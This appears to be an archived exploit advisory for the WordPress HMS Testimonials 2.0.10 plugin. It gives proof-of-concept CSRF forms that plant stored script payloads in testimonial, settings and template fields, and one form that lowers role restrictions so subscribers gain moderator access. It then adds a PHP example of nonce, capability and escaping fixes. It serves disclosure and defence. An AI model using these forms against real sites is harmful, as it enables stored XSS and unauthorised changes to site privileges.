WordPress HMS Testimonials 2.0.10 XSS / CSRF Vulnerability

2013-08-10 10:01:22
Original source: http://www.1337day.com/exploit/21090



Testing method:

Proof of Concept
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
    <input type="hidden" name="name" value="<script>alert('xss')</script>">
    <input type="hidden" name="image" value="<script>alert('xss')</script>">
    <input type="hidden" name="testimonial_date" value="08/08/2013">
    <input type="hidden" name="url" value="<script>alert(String.fromCharCode(88,83,83))</script>">
    <input type="hidden" name="testimonial" value="<script>alert('xss')</script>">
    <input type="hidden" name="display" value="1">
    <input type="submit" name="save" value="Save Testimonial">
</form>

2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
    <input type="hidden" name="name" value="New group">
    <input type="submit" name="save" value="Save Group">
</form>

3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
    <input type="hidden" name="active_links_nofollow" value="1">
    <input type="hidden" name="image_width" value='100'>
    <input type="hidden" name="image_height" value='100'>
    <input type="hidden" name="date_format" value='m/d/Y"><script>alert(3)</script>'>
    <input type="hidden" name="testimonial_container" value='div'>
    <input type="hidden" name="recaptcha_publickey" value="">
    <input type="hidden" name="recaptcha_privatekey" value="">
    <input type="submit" name="save" value="Save Settings (Default)">
</form>

3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
    <input type="hidden" name="moderator" value="subscriber">
    <input type="hidden" name="roles" value="subscriber">
    <input type="hidden" name="num_users_can_create" value="9999">
    <input type="hidden" name="autoapprove" value="subscriber">
    <input type="hidden" name="moderators_can_access_settings" value="1">
    <input type="hidden" name="js_load" value="1">
    <input type="hidden" name="roleorder[]" value="editor">
    <input type="hidden" name="roleorder[]" value="author">
    <input type="hidden" name="roleorder[]" value="contributor">
    <input type="hidden" name="roleorder[]" value="subscriber">
    <input type="submit" name="save" value="Save Settings (Advanced)">
</form>

3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
    <input type="hidden" name="name" value="xss">
    <input type="hidden" name="type" value="textarea">
    <input type="hidden" name="showonform" value="1">
    <input type="submit" name="save" value="Save Settings (Custom Fields)">
</form>

3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
    <input type="hidden" name="name" value="New template<script>alert('xss')</script>">
    <input type="hidden" name="item[]" value="system_id">
    <input type="submit" name="save" value="Settings Templates (Save)">
</form>


Vendor patch:

http://wordpress.org/plugins/hms-testimonials/
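
The forms in the Proof of Concept carry no anti-CSRF token and put script markup into stored fields. The following is an added example, not the plugin's code or the vendor's patch, of how a WordPress admin handler for form 1 could reject forged requests and neutralise those values. The field names come from the PoC; the hmsx_* function names, the nonce action and field, the capability, and the treatment of "image" and "url" as URLs are assumptions.

```php
<?php
// Added example: NOT the HMS Testimonials source or the vendor's patch.
// Hypothetical: hmsx_* names, nonce action/field, capability, URL-typed "image".
function hmsx_render_addnew_form() {
    echo '<form method="post">';
    // Hidden per-user, per-action token that a cross-site form cannot know.
    wp_nonce_field( 'hmsx_add_testimonial', 'hmsx_nonce' );
    foreach ( array( 'name', 'image', 'testimonial_date', 'url', 'testimonial' ) as $f ) {
        printf( '<input type="text" name="%s">', esc_attr( $f ) );
    }
    echo '<input type="checkbox" name="display" value="1">';
    echo '<input type="submit" name="save" value="Save Testimonial"></form>';
}

function hmsx_handle_addnew() {
    if ( ! isset( $_POST['save'] ) ) {
        return null; // nothing submitted
    }
    // CSRF check: aborts the request unless the nonce is valid for this user.
    check_admin_referer( 'hmsx_add_testimonial', 'hmsx_nonce' );
    // Authorisation check, independent of the nonce.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    $in   = wp_unslash( $_POST );
    $date = DateTime::createFromFormat( 'm/d/Y', (string) ( $in['testimonial_date'] ?? '' ) );
    // Input handling: each field is reduced to the type it is meant to hold.
    return array(
        'name'             => sanitize_text_field( $in['name'] ?? '' ),
        'image'            => esc_url_raw( $in['image'] ?? '' ),
        'url'              => esc_url_raw( $in['url'] ?? '' ),
        'testimonial'      => wp_kses_post( $in['testimonial'] ?? '' ),
        'testimonial_date' => $date ? $date->format( 'Y-m-d' ) : '',
        'display'          => empty( $in['display'] ) ? 0 : 1,
    );
}

function hmsx_render_testimonial( array $t ) {
    // Output escaping by context, applied even to data sanitised on input.
    return sprintf(
        '<div class="testimonial"><img src="%s" alt=""><blockquote>%s</blockquote>'
        . '<a href="%s">%s</a> <span>%s</span></div>',
        esc_url( $t['image'] ),
        wp_kses_post( $t['testimonial'] ),
        esc_url( $t['url'] ),
        esc_html( $t['name'] ),
        esc_html( $t['testimonial_date'] )
    );
}
```

The group, settings and template forms (2 and 3.1 to 3.4) need the same nonce and capability checks. A value echoed back into an HTML attribute, such as date_format, is escaped with esc_attr().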

About the author

xiaowei